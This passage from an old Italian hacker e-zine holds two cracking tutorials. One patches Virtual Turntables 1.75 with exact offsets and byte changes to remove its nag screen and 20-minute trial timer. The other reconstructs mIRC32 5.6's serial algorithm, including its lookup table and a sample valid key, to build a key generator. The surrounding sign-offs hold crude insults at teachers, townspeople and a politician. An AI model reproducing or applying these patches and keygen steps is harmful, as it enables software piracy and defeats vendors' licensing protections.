GotoXY(8,11); writeln (' Ci tengo a precisare che ho corretto molti degli errori presenti');
GotoXY(8,12); writeln (' sia di codice che di logica ma non assicuro che non ce ne siano');
GotoXY(8,13); writeln (' molti altri eheheh');
GotoXY(8,14); writeln (' Dedico questo programma a: tutti gli Spippolatori con in testa');
GotoXY(8,15); writeln (' RigoR MorteM e Jamil, a tutti quelli del NewBies Staff che magari');
GotoXY(8,16); writeln (' adesso sono al numero 10 della e-zine, ai DiB, al S0ftProject con in');
GotoXY(8,17); writeln (' testa Spirit, Cavallo, Fusys e LordFelix, alle BadLands, e in particolar');
GotoXY(8,18); writeln (' modo a mia madre per tutto quello che ha fatto per me.');
GotoXY(8,19); writeln (' Un augurio speciale a Chrome per il suo "Supermercato dell''hacker"');
GotoXY(8,20); writeln (' (si chiama cosi'' mi hanno detto... e'' vero? hihihi)');
GotoXY(8,21); writeln (' Infine un ultimo saluto al mitico ULNTWH99 e ad Alfredo, amici');
GotoXY(8,22); writeln (' che confermano il detto "chi trova un amico trova un tesoro".');
GotoXY(8,23); writeln (' Un ringraziamento molto particolare a RigoR MorteM al');
GotoXY(8,24); writeln (' quale dico che il pacchetto lo tengo ancora x ricordo...');
GotoXY(8,26); readln;
end;
--- FINE COMMENTO ---

Ora che ho finito questo articolo, Dante e' ancora li' che fa il suo e volevo
cogliere l'occasione x dire che...HO FINITO PRIMA IO :PPPPPPPP...hihiihihihi
...e poi io sarei un "maturato"...tnx ai mie prof e un fU‡K alla mia prof di
mate che in confronto alien e' bello quanto pamela anderson ;)

PS: non scrivetemi x pigliarmi x il culo...bastano gia' quei 30-40 che lo
fanno gia' ;) quindi...ah un ultima cosa...ovviamente come al solito ogni
consiglio e' ben accetto come qualsiasi critica anke dura tanto dopo aver
passato la maturita' ho ricominciato a credere in un dio che...vi punira'
tutti ahahahahahhh
PSS: dedico questo articolo al mio amico Eugenio il miglior NewBies che
conosca (xche' se dico hacker dopo si riprende l'UpLink che m'ha prestato e
dopo che ci faccio con ll3???). Un saluto speciale a Federico, a Dante, a
DeVilNeT, a RigoR MorteM, a \sPIRIT\ e a tutti quelli che aiutano qualcuno
senza chiedere niente in cambio, quindi a tutti quelli che portano avanti
tutto il crazy world of internet indipendentemente dal fatto che buchino
server o meno e dal fatto che usino linux o windows...

Byez N0bodY88

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°°²
²°°°ÛÛ°°°°ÛÛ°°ÛÛ²²²²ÛÛ°°ÛÛ²²²²ÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛÛÛ°°ÛÛ°°ÛÛ°°°°°°°°°²
²°°°ÛÛ°°°°°°°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°°°°°°°ÛÛÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°ÛÛ°°ÛÛ°°ÛÛÛÛ°°°²
²°°°ÛÛ°°°°ÛÛ°°ÛÛ°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛ°°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°²
²°°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°°ÛÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛÛ°°ÛÛÛÛÛÛÛÛ°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ HOW TO VTT 1.75 ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

SOLITA PREMESSA: non sono un cracker, non sono un hacker, sono un newbies
come voi. Quindi se troverete in questo articolo qualche
imprecisione e/o qualke stronzata non venitevi a lamentare :)
Saluti: DantuzAliguz, nobo, harlok, yado, falcon, dev666,
lord, ecc . . .

Per questo quarto numero di newbies, tanto per cambiare, ho deciso di scrivere
un articolo sul cracking. Iniziamo subito senza perdere troppo tempo . . .
Oggi crakkeremo Virtual Turntables 1.75. Ho deciso di scrivere un articolo su
questo prog xche' mi ha incuriosito il suo sistema di protezione.
Gli strumenti necessari sono sempre i soliti: il mitico SI (che cmq lo useremo
poco xche' il lavoro l'ho gia' fatto io;), Windasm e Hiew
Installiamolo e per iniziare diamo un'okkiata al prog. All'avvio ci appare un
primo nag screen poi nel menu' appare un tasto register!. MMM ok. I problemi
sorgono quando cercheremo di disattivare il timer che dopo 20 min ci chiude
il prog !!
Ma procediamo con calma . . . per ora proviamo a togliere il nag e il tasto
register!
Apriamo windasm e disassebliamo il vtt.exe.
Clikkiamo su Functions/Imports. Ecco la lista di tutte le chiamate che il
prog effetua.
Naturalmente ci salta subito all'occhio quella kiamata Devices.?CheckRegistered@@YAHXZ
Ci rediamo conto che il prog effettua questa kiamata in quattro punti che
riporto:

* Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h
:004122CC E851500100 Call 00427322

* Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h
:00417D50 E8CDF50000 Call 00427322

* Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h
:00417D85 E898F50000 Call 00427322

* Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h
:0041998B E892D90000 Call 00427322

Ma attenzione . . dopo ogni chiamata al device.dll il prog in tutte e 4 i
punti confronta eax con il valore 01.
Per far credere al programma di essere registato bastera' forzare in tutti e
4 i punti il jmp condizionato.
Procediamo modificando l'offset 122D8 da 74(je) in EB(jmp)
Quindi il je all'offest 17D58 da 74(je) EB(jmp)
Il je 17D8D da 74(je) EB(jmp)
e per finire il 0F al 19995 in E9 con un 83 al 19996, un 00 all'19997
e un 90(nop) all'1999A

Avviamo VTT ed ecco che il nostro amato programma parte senza quel fastidioso
Nag iniziale e il tasto register! nel menu.

Passiamo ora alla fase numero 2 (ben + complicata)
Se non avete capito niente fino ad ora . . . vi consiglio di rileggerlo con +
attenzione o se siete negati x il cracking passate pure al prossimo articolo.

Il programma dopo 20 min da quando viene aperto si kiude automaticamente
utilizzado probabilmente un timer interno.
Probabilmente esistono altri modi per arrivare alla soluzione, ma preferisco
procedere per ora in questo modo che credo sia il + facile da spiegare.
Avviamo l'SI e attiviamo un BPX su MessageBoxA
Quindi CTRL+D per uscire. Avviamo vtt e attendiamo i 20 min necessari (uufff
per perdere tempo provate a mixarvi qualke mp3 :))
OK 19 min . . . 20 !!
Premete F12 per uscire dall'user32, clikkate su ok poi F12 fino a quando non
vi trovate in qualkosa del tipo TMP1090.dll (il numero 1090 puo' anke
cambiare).
A questo punto vi chiederete: ma do' sta sto TMP1090.dll ????
Bhe ve lo dico io . . . e' un dll temporaneo che il programma decrypta e
posiziona nella temp di windows con un nome radom (ecco xche' vi dicevo che
il 1090 puo' cambiare).
Direte voi bhe apriamo sto file forziamo i jmp e il gioco e' fatto !! NO
Non si puo' fare !!
Il file temporaneo e' quello che si ottiene decryptando il file InitSound.dat
che si trova nella stessa dir di VTT. Noterete che la differenza tra il file
tmp e il initsound.dat e' di un solo byte ma il secondo essendo un dll
cryptato non e' possibile apriro col windasm e quindi modificarlo !!
Quando poi kiudiamo il vtt.exe il file tmp viene automaticamente cancellato
senza che noi ci accorgessimo di nulla.
Appreso questo serve un po' di ragionamento per riuscir a fregare il ben
studiato prog.
Bhe non avete voglia di ragionare ??? non avete tempo ??? allora ve lo dico
io . . .
Tutto quello che vi sto per dire e' il frutto di un'ispirazione . . .
Skematizzo il tutto per rendere + facile:

COSA FA VTT.EXE
- controlla se registrato nel vtt.exe (jmp che abbiamo gia' forzato ...
non c'e' problem,a controllasse pure :)))
NEL DEVICES.DLL
- preleva il file initsound.dll
- lo decrypta
- gli assegna un nome random
- lo mette nella dir temp di windows
- effettua una kiamata al file
ALL'INTERNO DEL FILE TEMPORANEO
- controlla se il prog e' registato
- se non lo e' avvia il timer
- inizializza l'audio (PORC' PROPRIO QUI DOVEVA FARLO ????)
NEL DEVICES.DLL
- cancella il file temp

Lo skema e' abbastanza chiaro . . . credo :))
Bhe se il fottuto del programma non inizializzasse l'audio nel file temporaneo
sarebbe bastato cancellare la kiamata al file stesso impedendo in ogni caso
che il timer venga avviato.
Ma cio' non e' possibile quindi cercheremo di optare x un'altra via . . .
Ora skematizza l'altra via:

ALTRA VIA:
- controlla se registrato nel vtt.exe (jmp che abbiamo gia' forzato . . . non
c'e' problema, controllasse pure :)))
NEL DEVICES.DLL
- salta
- salta
- salta
- salta
- effettua una kiamata al file (eheh gia' decryptato e modificato che
noi avremo posizionato nell dir di vtt)
ALL'INTERNO DEL FILE TEMPORANEO
- controlla se il prog e' registato
- anke se non lo e' facciamo in modo che il timer non
venga avviato
- inizializza l'audio (OK)
NEL DEVICES.DLL
- NON cancella il file temp (xche' non e' + un temporaneo)

Tutto kiaro ????
Bhe vediamo ora come si puo' fare . . .
Prima di tutto procuriamoci il dll che il nostro mitico vtt ci decrypta e ci
mette nella temp di win. Quindi avviamo il prog, buttiamolo giu', apriamo il
gestione risorse e copiamoci il file tmpxxxx.tmp nella dir di vtt
rinominandolo in devilcrk.dll.
Ci okkuperemo dopo di questo file. Per ora procediamo con il devices.dll
facendogli saltare il processo del decrypt.
Procediamo pure con il Windasm.
Apriamo il file a diamo un'akkiata a Functions/Imports
* Reference To: KERNEL32.GetTempFileNameA, Ord:0163h
OOH MA KE BELLO !!
Clikkiamo due volte su KERNEL32.GetTempFileNameA:

* Referenced by a CALL at Address:
|:10006361
|
:10005E60 6AFF push FFFFFFFF
:10005E62 64A100000000 mov eax, dword ptr fs:[00000000]
:10005E68 68D8830010 push 100083D8
:10005E6D 50 push eax
:10005E6E B828130000 mov eax, 00001328
:10005E73 64892500000000 mov dword ptr fs:[00000000], esp
:10005E7A E8211E0000 call 10007CA0
:10005E7F A144E60010 mov eax, dword ptr [1000E644]
:10005E84 53 push ebx
:10005E85 8BC8 mov ecx, eax
:10005E87 55 push ebp
:10005E88 40 inc eax
:10005E89 56 push esi
:10005E8A 85C9 test ecx, ecx
:10005E8C 57 push edi
:10005E8D A344E60010 mov dword ptr [1000E644], eax
:10005E92 0F851B020000 jne 100060B3
:10005E98 8D9424F0010000 lea edx, dword ptr [esp+000001F0]
:10005E9F 52 push edx
:10005EA0 6800010000 push 00000100

* Reference To: KERNEL32.GetTempPathA, Ord:0165h
|
:10005EA5 FF1548900010 Call dword ptr [10009048]
:10005EAB 8D8424EC000000 lea eax, dword ptr [esp+000000EC]
:10005EB2 8D8C24F0010000 lea ecx, dword ptr [esp+000001F0]
:10005EB9 50 push eax
:10005EBA 6A00 push 00000000

* Possible StringData Ref from Data Obj ->"tmp"
|
:10005EBC 68CCE20010 push 1000E2CC
:10005EC1 51 push ecx

* Reference To: KERNEL32.GetTempFileNameA, Ord:0163h
|
:10005EC2 FF154C900010 Call dword ptr [1000904C]


Esaminiamo un po' cosa accade qui . . .
Il tutto inizia con una kiamata dal 10006361.
Nella stringa
:10005E92 0F851B020000 jne 100060B3
viene effettuato un controllo: e' gia' stato creato il file temp ???
Se no continua con il codice . . . nel caso contrario effettua il jmp.
Ma sikkome a noi non serve che il file venga creato forziamo il jmp
in modo tale ke il salto venga compiuto cmq in ogni caso.
Prendiamo l'offset (5E92) e proseguiamo con l'hiew.
Cerchiamo con F5 l'offset poi F3 per modificare il file e con
F2 modifichiamo il jne in jmp (attenzione nella riga successiva e'
necessario poi mettere un nop)
Riprendiamo il Windasm ed esaminiamo ora il codice dopo il jmp che riporto
qui:

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:10005E92(C)
|
:100060B3 6840E50010 push 1000E540 <=====

* Reference To: MFC42.MFC42:NoName0010, Ord:04A9h
|
:100060B8 E8C91F0000 Call 10008086

* Reference To: KERNEL32.GetLastError, Ord:011Ah
|
:100060BD 8B1D50900010 mov ebx, dword ptr [10009050]
:100060C3 8BE8 mov ebp, eax


Ci troviamo a questo punto sulla stringa 100063B3
In questo punto il prog fa un push di 1000E540 dove si trova la
path del file temporaneo (sara' qualkosa tipo: c:\windows\temp\tmpxxxx.tmp
che a noi servira' modificare in devilcrk.dll)
Per far questo riapriamo il nostro sempre amato Hiew con F4 scegliamo
Hex quindi con F5 cerchiamo la stringa E540. Procediamo con la modica
con F3 quindi F8 e inserite nel campo ASCII devilcrk.dll
premete invio e poi F8. A questo punto vedrete sulla destra il testo inserito
F9 x salvare.
Potete anche provare a far partire vtt per verificare se avete fatto tutto
correttamente. Il programma dopo 20 min si kiudera' ancora ma la differenza
sara' che vtt non creera' piu' il file temporaneo e quindi andra' sempre a
rikiamare il nostro devilcrk.dll.
Opss . . . porc' . . . se kiudiamo il programma, vtt canellera' il file
devilcrk.dll credendo sia un file temporaneo. Procediamo eliminando
la chiamata che ci cancella il nostro benedetto file.
Quindi: windasm, devices.dll, functions, imports, mmmm
Ma guarda che bella kiamata al KERNEL32.DeleteFileA !!!
hihi clikkiamo 2 volte . . .
ci troviamo qui'

* Reference To: MFC42.MFC42:NoName0009, Ord:047Fh
|
:10006178 E8031F0000 Call 10008080
:1000617D A144E60010 mov eax, dword ptr [1000E644]
:10006182 48 dec eax
:10006183 A344E60010 mov dword ptr [1000E644], eax
:10006188 750A jne 10006194
:1000618A 83C604 add esi, 00000004
:1000618D 56 push esi

* Reference To: KERNEL32.DeleteFileA, Ord:0057h
|
:1000618E FF1544900010 Call dword ptr [10009044] <===Qui'

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:10006188(C)
|
:10006194 5E pop esi
:10006195 C3 ret

A questo punto sara' necessario cancellare questa kiamata
ma dobbiamo cancellare anke l'add esi,04 e il push dell'esi
altrimenti mandiamo in tilt il programma :))
L'offset della 1000618A e' 618A
Apriamo Hiew e noppiamo dalla 618A fino alla 6193 con il codice
eax 90 (nop)
Fatto questo, possiamo riaprire vtt, chiuderlo e constatare che il file
devilcrk.dll non viene + cancellato.
Sara' ora necessario crakkare il file devilcrk.dll affinke' non venga
avvito il timer.
Vediamo un po' che si puo' fare . . .
Aprima con Windams il file Refs/String data reference
"**** YOUR TIME LIMIT HAS NOW EXPIRED!! "
Clikkiamo 2 volte:

* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:10001A1A(C), :10001A53(C)
|
:10001A71 B801000000 mov eax, 00000001
:10001A76 5E pop esi
:10001A77 C3 ret


:10001A78 90 nop
:10001A79 90 nop
:10001A7A 90 nop
:10001A7B 90 nop
:10001A7C 90 nop
:10001A7D 90 nop
:10001A7E 90 nop
:10001A7F 90 nop

Exported fn(): DllCheckRegistered - Ord:0001h
:10001A80 E81B020000 call 10001CA0
:10001A85 8B0D80530010 mov ecx, dword ptr [10005380]
:10001A8B 33C0 xor eax, eax
:10001A8D 85C9 test ecx, ecx
:10001A8F 0F95C0 setne al
:10001A92 C3 ret

:10001A93 90 nop
:10001A94 90 nop
:10001A95 90 nop
:10001A96 90 nop
:10001A97 90 nop
:10001A98 90 nop
:10001A99 90 nop
:10001A9A 90 nop
:10001A9B 90 nop
:10001A9C 90 nop
:10001A9D 90 nop
:10001A9E 90 nop
:10001A9F 90 nop

* Referenced by a CALL at Address:
|:100019FA
|
:10001AA0 8B4C2404 mov ecx, dword ptr [esp+04]
:10001AA4 8B442408 mov eax, dword ptr [esp+08]
:10001AA8 6A00 push 00000000
:10001AAA 50 push eax
:10001AAB 8B11 mov edx, dword ptr [ecx]
:10001AAD 52 push edx

* Reference To: DSOUND.DirectSoundCreate, Ord:0003h
|
:10001AAE E89D070000 Call 10002250
:10001AB3 F7D8 neg eax
:10001AB5 1BC0 sbb eax, eax
:10001AB7 40 inc eax
:10001AB8 C3 ret


:10001AB9 90 nop
:10001ABA 90 nop
:10001ABB 90 nop
:10001ABC 90 nop
:10001ABD 90 nop
:10001ABE 90 nop
:10001ABF 90 nop
:10001AC0 81ECE8030000 sub esp, 000003E8
:10001AC6 53 push ebx
:10001AC7 55 push ebp
:10001AC8 56 push esi
:10001AC9 57 push edi

* Reference To: MFC42.MFC42:NoName0004, Ord:0497h
|
:10001ACA E887090000 Call 10002456
:10001ACF 85C0 test eax, eax
:10001AD1 7410 je 10001AE3

* Reference To: MFC42.MFC42:NoName0004, Ord:0497h
|
:10001AD3 E87E090000 Call 10002456
:10001AD8 8B10 mov edx, dword ptr [eax]
:10001ADA 8BC8 mov ecx, eax
:10001ADC FF527C call [edx+7C]
:10001ADF 8BD8 mov ebx, eax
:10001AE1 EB02 jmp 10001AE5

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:10001AD1(C)
|
:10001AE3 33DB xor ebx, ebx

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:10001AE1(U)
|
:10001AE5 68804F1200 push 00124F80

* Reference To: KERNEL32.Sleep, Ord:023Fh
|
:10001AEA FF15EC600010 Call dword ptr [100060EC]
:10001AF0 83C9FF or ecx, FFFFFFFF

* Possible StringData Ref from Data Obj ->"**** YOUR TIME LIMIT HAS NOW EXPIRED!! "

I jmp all'10001A1A e 10001A53 sono quelli che cerkiamo

:10001A1A 7555 jne 10001A71
:10001A53 751C jne 10001A71

Ci bastera' modificare i jne degli offset E1A e E53 in je con il nostro hiew
Avviamo vtt . . . 5 10 20 30 min . . .
WoW il gioco e' fatto !!
X eventuali domande, crtitiche, minacce di morte, la mia mail e'
devilnet@freemail.it sempre pronto a rispondere ad ogni vostro messaggio.
Alla proxima
DeViLNeT

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ GENERATORE DI CHIAVI X MIRC32 5.6 ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Autore: cod
Oggetto: mIRC32 5.6
Obiettivo: Generatore di chiavi

Strumenti:
SoftICE 4.0
IDA 3.8a
Window Disassembler 8.93

Livello: BOOOO DECIDETE VOI

NOTA:
L'AUTORE NON SI ASSUME NESSUNA RESPONSABILITA' PER CIO' CHE FARETE DI QUESTO
DOCUMENTO... CESTINATELO E ACQUISTATE IL mIRC (in tal caso sarete SCEMI)

N.B.:
LE INFORMAZIONI CONTENUTE QUI SONO FRUTTO DELLE MIE FANTASIE PERVERSE E
DI QUELLE DEGLI AUTORI DI SOFT ICE E DI IDA

mIRC32 Š il pi— diffuso programma di IRC in ambiente Windows. Il programma
ha un costo di 20 dollari pari a circa 40.000 lire (per eccesso). Non Š una
gran cifra da sborsare e non venite a dire che il programma non Š utile.

Vogliamo acquistare tale programma, perchŠ siamo gente onesta (... spero voi)
quindi leggiamo la guida in linea... cosa dice?

Abbiamo due modi per spedire i soldi... mandandoli via posta ordinaria al
seguente indirizzo:

Khaled Mardam-Bey
Apt. 347,
56 Gloucester Road,
London SW7 4UB,
UK

... questo modo non Š tanto sicuro.. chiss… quando arriveranno... vediamo il
2. modo:

Registrazione on-line, Š richiesto un numero di carta di credito... be se
avete una carta di credito scegliete questa via e smettete di leggere.

Siete ancora qui ?
Allora avete lo stesso problema mio... niente carta di credito (non provate
con i generatori...) allora cosa possiamo fare? L'unico sarebbe crackare
il programma, ma ad ogni aggiornamento ci toccher… crackare! E' gi… perchŠ
la minima variazione a livello di codice sorgente pu• generare un file
eseguibile totalmente diverso!

Allora non lo crackiamo... facciamo un p• di reverse enginering
(non sapete che Š ? allora... reverse significa inverso
engin motore... o qualcosa del genere... quindi fare ci• che fa il programma
all'inverso)

Ma cosa ci pu• interessare a noi ? La procedura di registrazione, ed il
calcolo della PASSWORD.

Allora lanciamo il programma WDASM e disassembliamo l'eseguibile MIRC32.EXE
Cerchiamo la parola 'Sorry'... trovata ecco!
Andiamo un p• su nel codice e noteremo un salto condizionale... Andiamo
all'istruzione che effettua il salto e troviamo il seguente codice:

PUSH DWORD * Questa DWORD punta al seriale
PUSH DWORD * Questa DWORD punta al nome
CALL XXXXXXXX * Chiama una funzione
TEST EAX, EAX * Confronta EAX
JE YYYYYYYY * Salta se EAX Š uguale a 0

Traduciamo questo codice in un linguaggio ad alto livello:

if ValidatePassword(Name, Password) = 0 goto error

ok ora andiamo ad analizzare la funzione CALL...
La prima cosa che fa questa funzione Š quella di chiamare un'altra funzione
che ritorna un numero intero:

name_len=strlen(Name);

if (name_len < 5) return 0;

Quindi se il nome inserito Š minore di 5 caratteri ritorna 0 e il programma
ci rimanda a error.

Subito dopo questo if troviamo un'altra funzione che ha come parametri
esattamente Name e Password...
chiameremo tale funzione GenerateKey...

new_key=GenerateKey(Name, Password);

if (new_key != 0) goto continue
else return 1;

Ma il valore new_key cosa contiene ? Potrebbe contenere la nostra password
quindi andiamo ad analizzare questa funzione!

La prima cosa che fa il programma Š quella di trovare il trattino nella
password per scomporla in due sub codici. Per questo viene usata la funzione
_strchr che richiede come parametri l'indirizzo della stringa da analizzare
e il carattere da cercare.

new_address=_strchr(Password,'-');
if (new_address == 0) return 0;

Password[new_address]=0;

first_key=atol(Password); /* atol converte una stringa in intero a 32bit */
Password[new_address]='-';
second_key=atol(new_address+1);

Avete capito come fa a suddividere la password ?
Semmai new_address dovesse essere uguale a 0 il programma va in errore

Una volta che il programma ha salvate le due password in memoria nelle
variabili long utilizza la funzione _strlen(Name) per calcolare la lunghezza
del nome e viene salvata in un'altra variabile che chiamaremo DELTA..

Ora viene la parte pi— bella del programma, il calcolo delle password.

Il mIRC32 nella versione 5.x dispone di una tabella interna di numeri che
vengono impegnati per entrambe le password, quindi ecco scopiazzata dalla
memoria l'intera tabella:

0Bh 06h 11h 0Ch 0Ch 0Eh 05h 0Ch 10h 0Ah 0Bh 06h 0Eh 0Eh 04h 0Bh 06h 0Eh 0Eh
04h 0Bh 09h 0Ch 0Bh 0Ah 08h 0Ah 0Ah 10h 08h 04h 06h 0Ah 0Ch 10h 08h 0Ah 04h
10h

Ok questa tabella costituita da ben 38 elementi viene utilizzata dal mIRC per
calcolare la password, quindi Š indispensabile.

Passo 1 - Come calcolare la prima parte della password

Per semplificare il lavoro (vengono utilizzati i registri, quindi noi creiamo
per alcuni registri dei nomi fittizi) dichiariamo le seguenti variabili:
counter, calc_pass, lenght_name, table_import, var1

Assegniamo i seguenti valori alle 4 variabili:
counter=3;
calc_pass=0;
lenght_name=_strlen(Name) /* Lunghezza della nostra password! ;) */
table_import=0 /* Punta ad un elemento della tabella, lo 0 indica il primo,
1 il 2. e cos via

var1 viene utilizzata per i nostri calcoli sporchi (... chiamateli come
vi pare, ma non Š di sicuro qualcosa di legale!)

Start_key1:
Se counter == lenght_name vai a password_trovata

Preleviamo dalla stringa Name il carattere puntato da counter quindi
lo assegnamo a var1

var1=Name[counter];

Moltiplichiamo var1 per l'elemento puntato da table_import

var1=var1*tabella[table_import]

Sommiamo a calc_pass var1
calc_pass=calc_pass+var1

Aggiungiamo 1 a table_import

Se table_import Š maggiore di 38 azzera table_import

Incrementa counter

Salta a Start_key1

password_trovata:
Bene ora abbiamo in calc_pass il valore da noi cercato! la prima chiave

(... ops... ma non Š legale, si ma che colpa ne ho io se il mIRC mette la
password a disposizione nel registro ebx e fa un cmp ebx, [ebp+4]
dove in ebx abbiamo calc_pass mentre in ebp+4 troviamo la prima parte della
chiave da noi inserita!)

Miei cari criminali (vi posso chiamare cos ?) ora cosa ci tocca... la
2. parte diranno i pi— bravi e attenti... gi… perchŠ fino adesso abbiamo
solo la prima parte della password (????-)

Allora dichiariamo le stesse variabili!
counter=3;
calc_pass=0;
lenght_name=_strlen(Name)
table_import=0
var1

GiÂ… ma a che cazzo serve al mIRC le iniziali del mio nome se poi mi va a
prendere la 4 lettera del cazzo (quasi quasi dimenticavo di accennarvi...
io faccio riferimento all'assembly e al borland turbo c++ dove il primo
elemento di un array ha come indice +00 e non +01 (come i basicchiani
... o questo termine me lo sono inventato proprio adesso!))

Start_key2:
Se counter == lenght_name vai a password_trovata

Preleviamo dalla stringa Name il carattere puntato da counter quindi
lo assegnamo a var1

var1=Name[counter];

Moltiplichiamo var1 * il carattere precedente!
var1=Name[counter]*Name[counter-1]

Moltiplichiamo var1 per l'elemento puntato da table_import

var1=var1*tabella[table_import]

Sommiamo a calc_pass var1
calc_pass=calc_pass+var1

Aggiungiamo 1 a table_import

Se table_import Š maggiore di 38 azzera table_import

Incrementa counter

Salta a Start_key2

password_trovata:
SIIIIII ORA var1 conterrÂ… il nostro secondo codice!

Esempio pratico: cod ha un nome come tutti gli essere umani ma dato che cod
Š di 3 caratteri (non protestate per il mio nick ma certe volte me ne sono
capitati alcuni che Š meglio non protestare! me ne sono accorto dopo cosa
avevo scelto x nome :( ma oramai ci sono abituato e tranne un bastardo
di napoli che sfotteva nessuno mi ha mai detto niente...

cod = Antonio (Š il mio vero nome! :) che bello... chiss… se il nome fa
la differenza nella vita, di sicuro nel mIRC si!

Metto in Name Antonio
Codice: 4998-551106

Che bellooooooooooo ci sono riuscito! Senza dover ricorrere a sporchi
trucchi..

Spero di essere stato un p• chiaro, so che qualcuno mi vorr… crocifiggere...
Ora passiamo ai saluti tanto per chiudere questo articolo:
eXceptiON HandlER : SOURCE OF KAOS resta sempre SOURCE OF KAOS
Mauro32 : Grazie per spacecdr e per tutto quello che sai!
Artiglio : IN GALERA IO NON CI VADO! MAIIIIIIIII
SoftWord : NOP ... ops.... forse Š meglio evitarlo un p•
LanDLorD : Sto ancora aspettando quel pacchetto da crackare!
: Quando me lo mandi ??
Techno Knight : MA CHE FINE HAI FATTO ?
DeViLNeT : Scusa x quella battuta fuori luogo la prima sera che ci
: siamo conosciuti!
^WaR^CaT^ : ??? SE QUALCUNO LO VEDE MI FACCIA SAPERE!
anto1 : \
M4TRIX : / CHE FATE IN VACANZA DI BELLO ? IO QUALCOSA DI UTILE
_JohNnY- : Ti stai spassando ?? QUANDO TORNI A CASA FAMMI SAPERE
Capotribu : CIAO CAPO
MaLaTtIa : Pensi che sia utile a qualcosa ?
Kai01 : ciao kai! non ci conosciamo bene ma sarÂ… una cosa da poco
CrackMan : Al contrario di quanto dice il nick non cracka... ma Š
: una brava persona! (come del resto tutti noi...)
|-g3no-| : GENO... non trova mai niente di utile da scaricare!
BigJIM : lamerlogs.cjb.net ! Quando torna dalle vacanze quello
: prende un accidenti!!! L'abbiamo combinata grossa? NOO

Un saluto ai membri di ringzer0 i primi ad avere coraggio in italia ad
esporre tutte le loro idee sull'arte dell'inverso! UN APPLAUSO A QUESTI
BRAVI RAGAZZI... CONTINUATE COS CHE POI CI VEDIAMO IN CARCERE

N0BODY88 PER AVER CHIESTO UNA COLLABORAZIONE SENZA SAPERE COSA FACCIO!

Per qualsiasi chiarimento, suggerimento, complimento ecco la mia e-mail:
cod@gurlmail.com

Mi potete contattare su ICQ (chiedete a ZioFill, lui sa il mio numero! CIAO
ZIOOOOOOOOOOOOOOO Š il 2 agosto, te sarai ad arrostirti al sole e io invece
mi sono appena rasato a 0 x prendere un p• di fresco al cervello altrimenti
chiss… cosa mi pu• passare nella testa!)

Questo non Š un saluto ma bens il contrario!
A tutti quei deficenti di Vibo Valentia che si credono DIO e poi sono una
massa di coglioni! Sapete da dove si accende il computer??? A me pare di no
VAFFANCULO A TUTTI I MIEI PROFESSORI CHE MI HANNO ROTTO PER ANNI A SCUOLA
RINGRAZIO MIO CUGINO PER AVERMI DETTO IMPARA L'ASSEMBLER CHE TI PUO' TORNARE
UTILE (SI ECCOME NO!)
UN ALTRO VAFFANCULO AD UNA PERSONA DI CUI NON DICO NIENTE ALTRIMENTI
GIA' DA QUEL MINIMO CHE LA CONOSCO SO CHE NON SI FA I CAZZI SUOI!

VAFFANCULO A BERLINGUER CHE CON LA SUA RIFORMA DEL CAZZO MI HA TENUTO
